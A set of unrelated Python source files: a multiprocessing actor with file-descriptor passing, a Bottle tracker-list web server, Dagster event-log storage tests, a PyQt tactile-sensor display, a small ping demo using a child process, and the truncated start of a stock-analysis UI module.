_SEND_FDS_DUMMY = b'0'
class _Stub:
def __init__(self, referent_type, process, conn):
self._conn = conn
self._submit = _BoundMethod('_submit', conn)
self._apply = _BoundMethod('_apply', conn)
self.m = _Methods(referent_type, process, conn)
def send_fds(self, fds):
ASSERT.not_empty(fds)
_conn_send(self._conn, _Call('_send_fds', (len(fds), ), {}))
sock = socket.socket(fileno=self._conn.fileno())
try:
_send_fds(sock, [_SEND_FDS_DUMMY], fds)
finally:
sock.detach()
remote_fds, exc = _conn_recv(self._conn)
if exc is not None:
raise exc
ASSERT.equal(len(remote_fds), len(fds))
return remote_fds
def submit(self, func, *args, **kwargs):
return self._submit(func, args, kwargs)
def apply(self, func, *args, **kwargs):
return self._apply(func, args, kwargs)
class _Methods:
def __init__(self, referent_type, process, conn):
self._referent_type = referent_type
self._process = process
self._bound_methods = g1_collections.LoadingDict(
functools.partial(_BoundMethod, conn=conn)
)
def __getattr__(self, name):
ASSERT.none(self._process.exitcode)
attr = getattr(self._referent_type, name, None)
bound_method = self._bound_methods[ASSERT.not_startswith(name, '_')]
if attr is None or isinstance(attr, property):
# Instance attribute or property.
return bound_method()
else:
# Static/class/instance method.
return bound_method
class _BoundMethod:
def __init__(self, name, conn):
self._name = name
self._conn = conn
def __call__(self, *args, **kwargs):
_conn_send(self._conn, _Call(self._name, args, kwargs))
result, exc = _conn_recv(self._conn)
if exc is not None:
raise exc
return result
class _ProcessActor:
# TODO: Get this from g1.apps.loggers?
_LOG_FORMAT = (
'%(asctime)s %(threadName)s %(levelname)s %(name)s: %(message)s'
)
def __init__(self, name, conn):
self._name = name
self._conn = conn
self._referent = None
def __call__(self):
self._process_init()
try:
while True:
try:
call = _conn_recv(self._conn)
except (EOFError, OSError, KeyboardInterrupt) as exc:
LOG.warning('actor input closed early: %r', exc)
break
if call is None: # Normal exit.
break
self._handle(call)
del call
except BaseException:
# The actor only exits when self._conn is closed or when
# call is None. We treat everything else as a crash, even
# a BaseException like SystemExit.
LOG.exception('actor crashed')
raise
finally:
self._process_cleanup()
def _process_init(self):
threading.current_thread().name = self._name
logging.basicConfig(level=logging.INFO, format=self._LOG_FORMAT)
LOG.info('start: pid=%d', os.getpid())
def _process_cleanup(self):
LOG.info('exit: pid=%d', os.getpid())
self._conn.close()
# NOTE:
#
# * When handling exceptions, remember to strip off the stack trace
# before sending it back (although I think pickle does this for
# you?).
#
# * Because recv_bytes is blocking, you have to be very, very careful
# not to block the actor's caller indefinitely while it waits for the
# actor's response. One particular example is pickle.dumps, which
# fails in many cases; this is why we call ForkingPickler.dumps
# explicitly.
def _handle(self, call):
# First, check actor methods.
if call.method == '_adopt':
self._handle_adopt(call)
elif call.method == '_disadopt':
self._handle_disadopt(call)
elif call.method == '_send_fds':
self._handle_send_fds(call)
elif call.method == '_submit':
self._handle_submit(call)
# Then, check referent methods.
elif self._referent is None:
self._send_exc(AssertionError('expect referent not None'))
elif call.method == '_apply':
self._handle_apply(call)
elif call.method.startswith('_'):
self._send_exc(
AssertionError('expect public method: %s' % call.method)
)
else:
self._handle_method(call)
def _send_result(self, result):
self._conn.send_bytes(self._pickle_pair((result, None)))
def _send_exc(self, exc):
self._conn.send_bytes(
self._pickle_pair((None, exc.with_traceback(None)))
)
@staticmethod
def _pickle_pair(pair):
try:
return multiprocessing.reduction.ForkingPickler.dumps(pair)
except Exception as exc:
LOG.error('pickle error: pair=%r exc=%r', pair, exc)
return multiprocessing.reduction.ForkingPickler.dumps(
(None, exc.with_traceback(None))
)
def _handle_adopt(self, call):
self._referent = call.args[0]
self._send_result(None)
def _handle_disadopt(self, call):
del call # Unused.
self._referent = None
self._send_result(None)
def _handle_send_fds(self, call):
num_fds = call.args[0]
sock = socket.socket(fileno=self._conn.fileno())
try:
msg, fds, _, _ = _recv_fds(sock, len(_SEND_FDS_DUMMY), num_fds)
except Exception as exc:
self._send_exc(AssertionError('recv_fds error: %r' % exc))
return
finally:
sock.detach()
if msg != _SEND_FDS_DUMMY:
self._send_exc(
AssertionError(
'expect dummy message %r, not %r' % (_SEND_FDS_DUMMY, msg)
)
)
return
self._send_result(fds)
def _handle_submit(self, call):
try:
func, args, kwargs = call.args
result = func(*args, **kwargs)
except BaseException as exc:
self._send_exc(exc)
else:
self._send_result(result)
def _handle_apply(self, call):
try:
func, args, kwargs = call.args
result = func(self._referent, *args, **kwargs)
except BaseException as exc:
self._send_exc(exc)
else:
self._send_result(result)
def _handle_method(self, call):
try:
method = getattr(type(self._referent), call.method, None)
bound_method = getattr(self._referent, call.method)
if method is None or isinstance(method, property):
# Instance attribute or property.
result = bound_method
elif isinstance(method, types.MethodType):
# Class method.
result = method(*call.args, **call.kwargs)
elif inspect.isgeneratorfunction(bound_method):
# Replace a generator with a list because generators are
# not pickle-able.
result = list(bound_method(*call.args, **call.kwargs))
else:
# Static method or instance method.
result = bound_method(*call.args, **call.kwargs)
except BaseException as exc:
self._send_exc(exc)
else:
self._send_result(result)
def _conn_send(conn, obj):
conn.send_bytes(multiprocessing.reduction.ForkingPickler.dumps(obj))
def _conn_recv(conn):
return multiprocessing.reduction.ForkingPickler.loads(conn.recv_bytes())
# TODO: Use stdlib's send_fds when we upgrade to Python 3.9.
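# (For reference: on Python 3.9+ the stdlib offers socket.send_fds(sock,
# buffers, fds) and socket.recv_fds(sock, bufsize, maxfds), which the two
# helpers below mirror.)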
def _send_fds(sock, buffers, fds, flags=0, address=None):
return sock.sendmsg(
buffers,
[(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array('i', fds))],
flags,
address,
)
# TODO: Use stdlib's recv_fds when we upgrade to Python 3.9.
def _recv_fds(sock, bufsize, maxfds, flags=0):
fds = array.array('i')
msg, ancdata, flags, addr = sock.recvmsg(
bufsize,
socket.CMSG_LEN(maxfds * fds.itemsize),
flags,
)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
if cmsg_level == socket.SOL_SOCKET and cmsg_type == socket.SCM_RIGHTS:
fds.frombytes(
cmsg_data[:len(cmsg_data) - (len(cmsg_data) % fds.itemsize)]
)
return msg, list(fds), flags, addr
|
server.py
|
import logging
import threading
from logging import FileHandler
from bottle import Bottle, run, static_file, request, response, HTTPError, redirect, mako_template as template
from requestlogger import WSGILogger, ApacheFormatter
import trackon
import trackerlist_project
app = Bottle()
logger = logging.getLogger('trackon_logger')
logger.setLevel(logging.INFO)
handler = logging.FileHandler('trackon.log')
logger_format = logging.Formatter('%(asctime)s - %(message)s')
handler.setFormatter(logger_format)
logger.addHandler(handler)
logger.info('Server started')
@app.route('/')
def main():
trackers_list = trackon.get_all_data_from_db()
trackers_list = trackon.process_uptime_and_downtime_time(trackers_list)
return template('tpl/main.mako', trackers=trackers_list, active='main')
@app.route('/', method='POST')
def new_trackers():
new_ts = request.forms.get('new_trackers')
check_all_trackers = threading.Thread(target=trackon.enqueue_new_trackers, args=(new_ts,))
check_all_trackers.daemon = True
check_all_trackers.start()
return main()
@app.route('/api/add', method='POST')
def new_trackers_api():
response.set_header("Access-Control-Allow-Origin", "*")
new_ts = request.forms.get('new_trackers')
check_all_trackers = threading.Thread(target=trackon.enqueue_new_trackers, args=(new_ts,))
check_all_trackers.daemon = True
check_all_trackers.start()
response.status = 204
return response
@app.route('/submitted')
def submitted():
return template('tpl/submitted.mako', data=trackon.submitted_data, size=len(trackon.submitted_trackers), active='submitted')
@app.route('/faq')
def faq():
return template('tpl/static/faq.mako', active='faq')
@app.route('/list')
def list_stable():
stable_list, size = trackon.list_uptime(95)
return template('tpl/list.mako', stable=stable_list, size=size, active='list')
@app.route('/api')
def api():
return template('tpl/static/api-docs.mako', active='api')
@app.route('/raw')
def raw():
return template('tpl/raw.mako', data=trackon.raw_data, active='raw')
@app.route('/api/<percentage:int>')
def api_percentage(percentage):
if 0 <= percentage <= 100:
add_api_headers()
formatted_list, not_needed_length = trackon.list_uptime(percentage)
return formatted_list
else:
# abort(400, "The percentage has to be between 0 and 100") is not used here because abort() does not allow custom headers
raise HTTPError(status=400, body="The percentage has to be between 0 and 100", headers={"Access-Control-Allow-Origin": "*"})
@app.route('/api/stable')
def api_stable():
return api_percentage(95)
@app.route('/api/all')
def api_all():
return api_percentage(0)
@app.route('/api/live')
def api_live():
add_api_headers()
return trackon.list_live()
@app.route('/api/udp')
def api_udp():
add_api_headers()
return trackon.api_udp()
@app.route('/api/http')
def api_http():
add_api_headers()
return trackon.api_http()
@app.route('/about')
def about():
return template('tpl/static/about.mako', active='about')
@app.route('/static/<path:path>') # matches any static file
def static(path):
return static_file(path, root='static')
@app.route('/<filename>.<filetype:re:(png|svg|ico)>') # matches all favicons that should be in root
def favicon(filename, filetype):
response.content_type = 'image/x-icon'
return static_file(filename + '.' + filetype, root='static/imgs')
@app.route('/<filename>.<filetype:re:(xml|json)>') # matches browserconfig and manifest that should be in root
def app_things(filename, filetype):
return static_file(filename + '.' + filetype, root='static')
@app.hook('after_request')
def check_host_http_header():
accepted_hosts = {'localhost:8080', 'localhost', '127.0.0.1:8080', '127.0.0.1'}
if request.headers['host'] not in accepted_hosts:
redirect('http://localhost:8080/', 301)
def add_api_headers():
response.set_header("Access-Control-Allow-Origin", "*")
response.content_type = 'text/plain'
update_status = threading.Thread(target=trackon.update_outdated_trackers)
update_status.daemon = True
update_status.start()
get_trackerlist_project_list = threading.Thread(target=trackerlist_project.main)
get_trackerlist_project_list.daemon = True
get_trackerlist_project_list.start()
handlers = [FileHandler('access.log'), ]
app = WSGILogger(app, handlers, ApacheFormatter())
if __name__ == '__main__':
run(app, host='localhost', port=8080, server='waitress')
|
test_event_log.py
|
import os
import sys
import tempfile
import time
import traceback
from contextlib import contextmanager
import pytest
import sqlalchemy
from dagster.core.definitions import AssetMaterialization, ExpectationResult
from dagster.core.errors import DagsterEventLogInvalidForRun
from dagster.core.events import (
DagsterEvent,
DagsterEventType,
EngineEventData,
StepExpectationResultData,
StepMaterializationData,
)
from dagster.core.events.log import DagsterEventRecord
from dagster.core.execution.plan.objects import StepFailureData, StepSuccessData
from dagster.core.storage.event_log import (
ConsolidatedSqliteEventLogStorage,
InMemoryEventLogStorage,
SqlEventLogStorageMetadata,
SqlEventLogStorageTable,
SqliteEventLogStorage,
)
from dagster.core.storage.sql import create_engine
from dagster.seven import multiprocessing
@contextmanager
def create_in_memory_event_log_storage():
yield InMemoryEventLogStorage()
@contextmanager
def create_sqlite_run_event_logstorage():
with tempfile.TemporaryDirectory() as tmpdir_path:
yield SqliteEventLogStorage(tmpdir_path)
@contextmanager
def create_consolidated_sqlite_run_event_log_storage():
with tempfile.TemporaryDirectory() as tmpdir_path:
yield ConsolidatedSqliteEventLogStorage(tmpdir_path)
event_storage_test = pytest.mark.parametrize(
"event_storage_factory_cm_fn",
[
create_in_memory_event_log_storage,
create_sqlite_run_event_logstorage,
create_consolidated_sqlite_run_event_log_storage,
],
)
@event_storage_test
def test_init_log_storage(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
if isinstance(storage, InMemoryEventLogStorage):
assert not storage.is_persistent
elif isinstance(storage, (SqliteEventLogStorage, ConsolidatedSqliteEventLogStorage)):
assert storage.is_persistent
else:
raise Exception("Invalid event storage type")
@event_storage_test
def test_log_storage_run_not_found(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
assert storage.get_logs_for_run("bar") == []
@event_storage_test
def test_event_log_storage_store_events_and_wipe(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
assert len(storage.get_logs_for_run("foo")) == 0
storage.store_event(
DagsterEventRecord(
None,
"Message2",
"debug",
"",
"foo",
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.ENGINE_EVENT.value,
"nonce",
event_specific_data=EngineEventData.in_process(999),
),
)
)
assert len(storage.get_logs_for_run("foo")) == 1
assert storage.get_stats_for_run("foo")
storage.wipe()
assert len(storage.get_logs_for_run("foo")) == 0
@event_storage_test
def test_event_log_storage_store_with_multiple_runs(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
runs = ["foo", "bar", "baz"]
for run_id in runs:
assert len(storage.get_logs_for_run(run_id)) == 0
storage.store_event(
DagsterEventRecord(
None,
"Message2",
"debug",
"",
run_id,
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.STEP_SUCCESS.value,
"nonce",
event_specific_data=StepSuccessData(duration_ms=100.0),
),
)
)
for run_id in runs:
assert len(storage.get_logs_for_run(run_id)) == 1
assert storage.get_stats_for_run(run_id).steps_succeeded == 1
storage.wipe()
for run_id in runs:
assert len(storage.get_logs_for_run(run_id)) == 0
@event_storage_test
def test_event_log_storage_watch(event_storage_factory_cm_fn):
def evt(name):
return DagsterEventRecord(
None,
name,
"debug",
"",
"foo",
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.ENGINE_EVENT.value,
"nonce",
event_specific_data=EngineEventData.in_process(999),
),
)
with event_storage_factory_cm_fn() as storage:
watched = []
watcher = lambda x: watched.append(x) # pylint: disable=unnecessary-lambda
assert len(storage.get_logs_for_run("foo")) == 0
storage.store_event(evt("Message1"))
assert len(storage.get_logs_for_run("foo")) == 1
assert len(watched) == 0
storage.watch("foo", 0, watcher)
storage.store_event(evt("Message2"))
storage.store_event(evt("Message3"))
storage.store_event(evt("Message4"))
attempts = 10
while len(watched) < 3 and attempts > 0:
time.sleep(0.1)
attempts -= 1
storage.end_watch("foo", watcher)
time.sleep(0.3) # this value scientifically selected from a range of attractive values
storage.store_event(evt("Message5"))
assert len(storage.get_logs_for_run("foo")) == 5
assert len(watched) == 3
storage.delete_events("foo")
assert len(storage.get_logs_for_run("foo")) == 0
assert len(watched) == 3
@event_storage_test
def test_event_log_storage_pagination(event_storage_factory_cm_fn):
def evt(name):
return DagsterEventRecord(
None,
name,
"debug",
"",
"foo",
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.ENGINE_EVENT.value,
"nonce",
event_specific_data=EngineEventData.in_process(999),
),
)
with event_storage_factory_cm_fn() as storage:
storage.store_event(evt("Message_0"))
storage.store_event(evt("Message_1"))
storage.store_event(evt("Message_2"))
assert len(storage.get_logs_for_run("foo")) == 3
assert len(storage.get_logs_for_run("foo", -1)) == 3
assert len(storage.get_logs_for_run("foo", 0)) == 2
assert len(storage.get_logs_for_run("foo", 1)) == 1
assert len(storage.get_logs_for_run("foo", 2)) == 0
@event_storage_test
def test_event_log_delete(event_storage_factory_cm_fn):
with event_storage_factory_cm_fn() as storage:
assert len(storage.get_logs_for_run("foo")) == 0
storage.store_event(
DagsterEventRecord(
None,
"Message2",
"debug",
"",
"foo",
time.time(),
dagster_event=DagsterEvent(
DagsterEventType.ENGINE_EVENT.value,
"nonce",
event_specific_data=EngineEventData.in_process(999),
),
)
)
assert len(storage.get_logs_for_run("foo")) == 1
assert storage.get_stats_for_run("foo")
storage.delete_events("foo")
assert len(storage.get_logs_for_run("foo")) == 0
@event_storage_test
def test_event_log_get_stats_without_start_and_success(event_storage_factory_cm_fn):
# When an event log doesn't have a PIPELINE_START or PIPELINE_SUCCESS | PIPELINE_FAILURE event,
# we want to ensure storage.get_stats_for_run(...) doesn't throw an error.
with event_storage_factory_cm_fn() as storage:
assert len(storage.get_logs_for_run("foo")) == 0
assert storage.get_stats_for_run("foo")
def test_filesystem_event_log_storage_run_corrupted():
with tempfile.TemporaryDirectory() as tmpdir_path:
storage = SqliteEventLogStorage(tmpdir_path)
# URL begins sqlite:///
# pylint: disable=protected-access
with open(os.path.abspath(storage.conn_string_for_run_id("foo")[10:]), "w") as fd:
fd.write("some nonsense")
with pytest.raises(sqlalchemy.exc.DatabaseError):
storage.get_logs_for_run("foo")
def test_filesystem_event_log_storage_run_corrupted_bad_data():
with tempfile.TemporaryDirectory() as tmpdir_path:
storage = SqliteEventLogStorage(tmpdir_path)
SqlEventLogStorageMetadata.create_all(create_engine(storage.conn_string_for_run_id("foo")))
with storage.connect("foo") as conn:
event_insert = SqlEventLogStorageTable.insert().values( # pylint: disable=no-value-for-parameter
run_id="foo", event="{bar}", dagster_event_type=None, timestamp=None
)
conn.execute(event_insert)
with pytest.raises(DagsterEventLogInvalidForRun):
storage.get_logs_for_run("foo")
SqlEventLogStorageMetadata.create_all(create_engine(storage.conn_string_for_run_id("bar")))
with storage.connect("bar") as conn: # pylint: disable=protected-access
event_insert = SqlEventLogStorageTable.insert().values( # pylint: disable=no-value-for-parameter
run_id="bar", event="3", dagster_event_type=None, timestamp=None
)
conn.execute(event_insert)
with pytest.raises(DagsterEventLogInvalidForRun):
storage.get_logs_for_run("bar")
def cmd(exceptions, tmpdir_path):
storage = SqliteEventLogStorage(tmpdir_path)
try:
storage.get_logs_for_run_by_log_id("foo")
except Exception as exc: # pylint: disable=broad-except
exceptions.put(exc)
exc_info = sys.exc_info()
traceback.print_tb(exc_info[2])
def test_concurrent_sqlite_event_log_connections():
exceptions = multiprocessing.Queue()
with tempfile.TemporaryDirectory() as tmpdir_path:
ps = []
for _ in range(5):
ps.append(multiprocessing.Process(target=cmd, args=(exceptions, tmpdir_path)))
for p in ps:
p.start()
j = 0
for p in ps:
p.join()
j += 1
assert j == 5
excs = []
while not exceptions.empty():
excs.append(exceptions.get())
assert not excs, excs
@event_storage_test
def test_event_log_step_stats(event_storage_factory_cm_fn):
# Ensure storage.get_step_stats_for_run(...) aggregates per-step status,
# timing, materializations, and expectation results correctly.
run_id = "foo"
with event_storage_factory_cm_fn() as storage:
for record in _stats_records(run_id=run_id):
storage.store_event(record)
step_stats = storage.get_step_stats_for_run(run_id)
assert len(step_stats) == 4
a_stats = [stats for stats in step_stats if stats.step_key == "A"][0]
assert a_stats.step_key == "A"
assert a_stats.status.value == "SUCCESS"
assert a_stats.end_time - a_stats.start_time == 100
b_stats = [stats for stats in step_stats if stats.step_key == "B"][0]
assert b_stats.step_key == "B"
assert b_stats.status.value == "FAILURE"
assert b_stats.end_time - b_stats.start_time == 50
c_stats = [stats for stats in step_stats if stats.step_key == "C"][0]
assert c_stats.step_key == "C"
assert c_stats.status.value == "SKIPPED"
assert c_stats.end_time - c_stats.start_time == 25
d_stats = [stats for stats in step_stats if stats.step_key == "D"][0]
assert d_stats.step_key == "D"
assert d_stats.status.value == "SUCCESS"
assert d_stats.end_time - d_stats.start_time == 150
assert len(d_stats.materializations) == 3
assert len(d_stats.expectation_results) == 2
def _stats_records(run_id):
now = time.time()
return [
_event_record(run_id, "A", now - 325, DagsterEventType.STEP_START),
_event_record(
run_id,
"A",
now - 225,
DagsterEventType.STEP_SUCCESS,
StepSuccessData(duration_ms=100000.0),
),
_event_record(run_id, "B", now - 225, DagsterEventType.STEP_START),
_event_record(
run_id,
"B",
now - 175,
DagsterEventType.STEP_FAILURE,
StepFailureData(error=None, user_failure_data=None),
),
_event_record(run_id, "C", now - 175, DagsterEventType.STEP_START),
_event_record(run_id, "C", now - 150, DagsterEventType.STEP_SKIPPED),
_event_record(run_id, "D", now - 150, DagsterEventType.STEP_START),
_event_record(
run_id,
"D",
now - 125,
DagsterEventType.STEP_MATERIALIZATION,
StepMaterializationData(AssetMaterialization(asset_key="mat_1")),
),
_event_record(
run_id,
"D",
now - 100,
DagsterEventType.STEP_EXPECTATION_RESULT,
StepExpectationResultData(ExpectationResult(success=True, label="exp 1")),
),
_event_record(
run_id,
"D",
now - 75,
DagsterEventType.STEP_MATERIALIZATION,
StepMaterializationData(AssetMaterialization(asset_key="mat_2")),
),
_event_record(
run_id,
"D",
now - 50,
DagsterEventType.STEP_EXPECTATION_RESULT,
StepExpectationResultData(ExpectationResult(success=False, label="exp 2")),
),
_event_record(
run_id,
"D",
now - 25,
DagsterEventType.STEP_MATERIALIZATION,
StepMaterializationData(AssetMaterialization(asset_key="mat_3")),
),
_event_record(
run_id, "D", now, DagsterEventType.STEP_SUCCESS, StepSuccessData(duration_ms=150000.0)
),
]
def _event_record(run_id, step_key, timestamp, event_type, event_specific_data=None):
pipeline_name = "pipeline_name"
return DagsterEventRecord(
None,
"",
"debug",
"",
run_id,
timestamp,
step_key=step_key,
pipeline_name=pipeline_name,
dagster_event=DagsterEvent(
event_type.value,
pipeline_name,
step_key=step_key,
event_specific_data=event_specific_data,
),
)
def test_secondary_index():
with create_consolidated_sqlite_run_event_log_storage() as storage:
# Only consolidated_sqlite, postgres storage support secondary indexes
assert not storage.has_secondary_index("A")
assert not storage.has_secondary_index("B")
assert "A" in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" in storage._secondary_index_cache # pylint: disable=protected-access
storage.enable_secondary_index("A")
assert "A" not in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" in storage._secondary_index_cache # pylint: disable=protected-access
assert storage.has_secondary_index("A")
assert "A" in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" in storage._secondary_index_cache # pylint: disable=protected-access
assert not storage.has_secondary_index("B")
storage.enable_secondary_index("B")
assert "A" in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" not in storage._secondary_index_cache # pylint: disable=protected-access
assert storage.has_secondary_index("A")
assert storage.has_secondary_index("B")
assert "A" in storage._secondary_index_cache # pylint: disable=protected-access
assert "B" in storage._secondary_index_cache # pylint: disable=protected-access
|
single_patch.py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'interface.ui'
#
# Created by: PyQt5 UI code generator 5.10.1
#
# WARNING! All changes made in this file will be lost!
import os, sys, glob
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.uic import loadUiType
import numpy as np
import pyqtgraph as pg
import serial
import threading
import time
import importlib
from collections import deque
from threadhandler import ThreadHandler
Ui_MainWindow, QMainWindow = loadUiType('interface.ui')
##### The code runs two threads
# i) one for receiving data from the Microcontroller
# ii) another for updating the Interface using this data.
# Identifying the Micro Controller
ser = serial.Serial("/dev/ttyACM0",7372800)
ser.flushInput()
ser.flushOutput()
# Stores data from the Micro Controller
dataQueue = np.zeros((4,4,4))
update = 0
def getPos(pos) :
patchNum = pos//16
row = (pos%16)//4
col = (pos%16)%4
return patchNum + 4*row + 16*col
def getPos2(pos) :
patchNum = pos//16
row = (pos%16)//4
col = (pos%16)%4
return 4*patchNum + row + 16*col
# Functions to send and receive data from Micro Controller
def send(data) :
global ser
length = len(data)
for i in range(length) :
#print("writing")
ser.write((data[i]+"\r\n").encode('ascii'))
#print("wrote data :",data[i])
def receive() :
global dataQueue,ser,update
while True :
waiting = ser.inWaiting()
maxlength = 34
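# As parsed below, a full packet is 34 bytes: a start byte (value 1),
# 16 two-byte little-endian readings for one 4x4 patch, and an end byte (value 2).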
if waiting >= maxlength :
rawQueue = [x for x in ser.read(waiting)]
endByte = len(rawQueue)-1
#print(endByte,waiting)
while rawQueue[endByte] != 2 and endByte > 0 :
endByte = endByte-1
#print(endByte)
if endByte < maxlength-1 :
continue
if rawQueue[endByte-maxlength+1] == 1 :
for row in range(4) :
for col in range(4) :
pos = 2*(4*col+row)+endByte-maxlength+2
dataQueue[0][row][col] = 4096-(rawQueue[pos]+rawQueue[pos+1]*256)
update = 1
print("Received packet : ",dataQueue[0])
# Class for Interface
class Main(QMainWindow,Ui_MainWindow) :
def __init__(self):
super(Main,self).__init__()
self.setupUi(self)
# intensityData: array storing the data to be displayed on the Interface
self.intensityData = []
for i in range(4) :
self.intensityData.append(np.full((4,4,3),0))
# Two flags to avoid multiple starting and stopping of the threads
self.start = 0
self.stop = 0
# initialise Interface to blue
for i in range(4) :
for j in range(4) :
for k in range(4) :
self.intensityData[i][j][k][2] = 255
# Thread which updates the plot based on received data from Micro Controller
self.thr = ThreadHandler(self.processData)
print("Intitialisation")
self.init()
# init() Contains other initialisations
def init(self) :
print("Adding ViewBoxes")
# displays are the viewboxes (one for each patch of tactile sensors)
self.display1 = self.patch1.addViewBox()
self.display2 = self.patch2.addViewBox()
self.display3 = self.patch3.addViewBox()
self.display4 = self.patch4.addViewBox()
# Image items to be displayed on the viewboxes
self.currImage1 = pg.ImageItem(self.intensityData[0])
self.display1.addItem(self.currImage1)
self.currImage2 = pg.ImageItem(self.intensityData[1])
self.display2.addItem(self.currImage2)
self.currImage3 = pg.ImageItem(self.intensityData[2])
self.display3.addItem(self.currImage3)
self.currImage4 = pg.ImageItem(self.intensityData[3])
self.display4.addItem(self.currImage4)
# Functions of Start and Stop buttons
self.startButton.clicked.connect(self.doStart)
self.stopButton.clicked.connect(self.doStop)
def doStart(self) :
# starting the thread to update the Interface
global recvThread,ser
if self.start == 0 :
ser.flushInput()
self.start = 1
self.thr.start()
recvThread.start()
def doStop(self) :
# stop the thread which updates the Interface
global recvThread
if self.stop == 0 :
print("Stopped")
self.stop = 1
self.thr.pause()
recvThread.pause()
self.thr.kill()
recvThread.kill()
# The function to update the Interface in real time. This function is run in a thread.
def processData(self) :
global update,dataQueue
while True :
#print(update)
if update == 1 :
#print("First update")
for pos in range(64) :
patchNum = pos//16
row = (pos%16)//4
col = (pos%16)%4
if patchNum == 0 :
self.intensityData[0][row][col][0] = max(0,2*int(dataQueue[patchNum][col][row]/16)-255)
self.intensityData[0][row][col][2] = max(0,255-2*int(dataQueue[patchNum][col][row]/16))
self.intensityData[0][row][col][1] = 255-self.intensityData[0][row][col][2]-self.intensityData[0][row][col][0]
self.currImage1.setImage(self.intensityData[0],levels=(0,255))
elif patchNum == 1 :
self.intensityData[1][row][col][0] = max(0,2*int(dataQueue[patchNum][col][row]/16)-255)
self.intensityData[1][row][col][2] = max(0,255-2*int(dataQueue[patchNum][col][row]/16))
self.intensityData[1][row][col][1] = 255-self.intensityData[1][row][col][2]-self.intensityData[1][row][col][0]
self.currImage2.setImage(self.intensityData[1],levels=(0,255))
elif patchNum == 2 :
self.intensityData[2][row][col][0] = max(0,2*int(dataQueue[patchNum][col][row]/16)-255)
self.intensityData[2][row][col][2] = max(0,255-2*int(dataQueue[patchNum][col][row]/16))
self.intensityData[2][row][col][1] = 255-self.intensityData[2][row][col][2]-self.intensityData[2][row][col][0]
self.currImage3.setImage(self.intensityData[2],levels=(0,255))
elif patchNum == 3 :
self.intensityData[3][row][col][0] = max(0,2*int(dataQueue[patchNum][col][row]/16)-255)
self.intensityData[3][row][col][2] = max(0,255-2*int(dataQueue[patchNum][col][row]/16))
self.intensityData[3][row][col][1] = 255-self.intensityData[3][row][col][2]-self.intensityData[3][row][col][0]
self.currImage4.setImage(self.intensityData[3],levels=(0,255))
update = 0
#print(self.intensityData[0])
# Thread to receive data
#recvThread = threading.Thread(target = receive)
recvThread = ThreadHandler(receive)
# Update the display in parallel based on the received data. The interface class (Main)
# itself runs another thread.
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
main = Main()
main.show()
sys.exit(app.exec_())
|
multi_ping.py
|
from multiprocessing import Process, Pipe
import os
def create_new_process(pipe):
print("Filho process id: {}".format(os.getpid()))
command = pipe.recv()
pipe.send(os.popen(command).read())
pipe.close()
if __name__ == '__main__':
print("Pai process id: {}".format(os.getpid()))
saida_pai, saida_filho = Pipe()
filho = Process(target=create_new_process, args=(saida_filho,))
filho.start()
saida_pai.send("ping -c1 google.com")
print("output: {}".format(saida_pai.recv()))
filho.join()
print("exit...")
|
analyzer_ui.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
@version:
author:Sleepy
@time: 2017/08/08
@file: DataTable.py
@function:
@modify:
"""
import os
from PyQt5.QtWidgets import QLineEdit, QFileDialog, QCheckBox, QDateTimeEdit, QGridLayout
from StockAnalysisSystem.core.Utility.common import ProgressRate
from StockAnalysisSystem.core.Utility.ui_utility import *
from StockAnalysisSystem.core.Utility.TableViewEx import *
from StockAnalysisSystem.core.Utility.time_utility import *
from StockAnalysisSystem.ui.Utility.ui_context import UiContext
from StockAnalysisSystem.core.Utility.resource_sync import ResourceTagUpdater, ResourceUpdateTask
# # ------------------------- Analysis Task -------------------------
#
# class AnalysisTask(TaskQueue.Task):
# OPTION_CALC = 1
# OPTION_FROM_CACHE = 2
# OPTION_UPDATE_CACHE = 16
# OPTION_AUTO = OPTION_CALC | OPTION_FROM_CACHE | OPTION_UPDATE_CACHE
#
# OPTION_LOAD_JSON = 1024
# OPTION_DUMP_JSON = 2048
# OPTION_LOAD_DUMP_ALL = 4096
#
# OPTION_ATTACH_BASIC_INDEX = 4096
#
# def __init__(self, ui, strategy_entry: StrategyEntry, data_hub: DataHubEntry,
# selector_list: [str], analyzer_list: [str], time_serial: tuple,
# options: int, report_path: str, progress_rate: ProgressRate):
# super(AnalysisTask, self).__init__('AnalysisTask')
# self.__ui = ui
# self.__options = options
# self.__data_hub = data_hub
# self.__strategy = strategy_entry
# self.__selector_list = selector_list
# self.__analyzer_list = analyzer_list
# self.__time_serial = time_serial
# self.__report_path = report_path
# self.__progress_rate = progress_rate
#
# def run(self):
# print('Analysis task start.')
#
# clock = Clock()
# stock_list = self.select()
# result_list = self.analysis(stock_list)
# stock_metrics = self.fetch_stock_metrics()
# self.gen_report(result_list, stock_metrics)
#
# print('Analysis task finished, time spending: ' + str(clock.elapsed_s()) + ' s')
#
# self.__ui.notify_task_done()
#
# def identity(self) -> str:
# return 'AnalysisTask'
#
# # -----------------------------------------------------------------------------
#
# def select(self) -> [str]:
# data_utility = self.__data_hub.get_data_utility()
# stock_list = data_utility.get_stock_identities()
# return stock_list
#
# def analysis(self, securities_list: [str]) -> [AnalysisResult]:
# clock_all = Clock()
# full_dump_path = os.path.join(StockAnalysisSystem().get_project_path(), 'TestData', 'analysis_result.json')
# if self.__options & AnalysisTask.OPTION_LOAD_JSON != 0 and \
# self.__options & AnalysisTask.OPTION_LOAD_DUMP_ALL != 0:
# clock_load = Clock()
# total_result = self.__strategy.load_analysis_report(full_dump_path)
# print('Load all analysis result finished, Time spending: %ss' % clock_load.elapsed_s())
# else:
# total_result = self.__strategy.analysis_advance(
# securities_list, self.__analyzer_list, self.__time_serial,
# self.__progress_rate,
